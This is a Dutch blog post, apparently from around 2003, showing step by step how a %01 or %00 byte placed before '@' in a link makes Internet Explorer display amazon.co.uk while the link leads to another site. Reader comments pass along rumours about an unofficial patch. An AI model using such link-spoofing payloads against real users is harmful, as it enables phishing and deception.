Michel Vuijlsteke's weblog

Tales of Drudgery & Boredom.

Akelig

That’s some scary shit right there man:

  • maak een html-document aan, smijt daarin dit javascript:
    <script language=”javascript”>
    document.write(unescape(‘http://www.amazon.co.uk%01@www.zog.org’));
    </script>

  • opendoen in browser, en dan het resultaat copiëren, dat zou er iets in deze zin moeten uitzien (met zo’n blokje in het midden):
    http://www.amazon.co.uk@www.zog.org

  • gebruik de gekopieerde URL, met %01 proper geëncodeerd, in een andere html-file:
    <a href=”http://www.amazon.co.uk@www.zog.org”>gr8!</a>

  • in de statusbalk is de “echte” link nog wel zichtbaar, maar da’s ook rap verholpen door vóór de geëncodeerde %01 een %00 te zetten, alsdus:
    <a href=”http://www.amazon.co.uk%00@www.zog.org”>wassup?</a>

  • resultaat van al dat moois: yo check it — ik heb amazon gekaapt!

3 Comments

  1. Dat de statusbalk verkeerd is, tot daar aan toe, maar dat hij bij het parsen van de HTML-code los over die “http://www.amazon.co.uk%00@” leest en de link naar zog.org maakt…straf! Werkt dat bij Mozilla/Netscape/Safari ook?

  2. http://slashdot.org/articles/03/12/19/0135211.shtml?tid=113&tid=126&tid=128&tid=172&tid=95

    Er is dus een open-source patch. De vraag is: hoe is de programmeur van die patch aan de source van IE geraakt? En bovendien is er het gerucht dat de patch er voor zorgt dat elke bezochte url gevalideerd wordt op een server, en bovendien zit er een buffer overflow in. Probleem: MS kan nu niet dezelfde code gebruiken om het probleem op te lossen. Dus het zal nog wel even duren voordat er een MS patch komt. Grm!

  3. “open source patch” — yeah right. Dat zal ik alleen vertrouwen als ik de source zelf compileer, en dan nog!

Zeg uw gedacht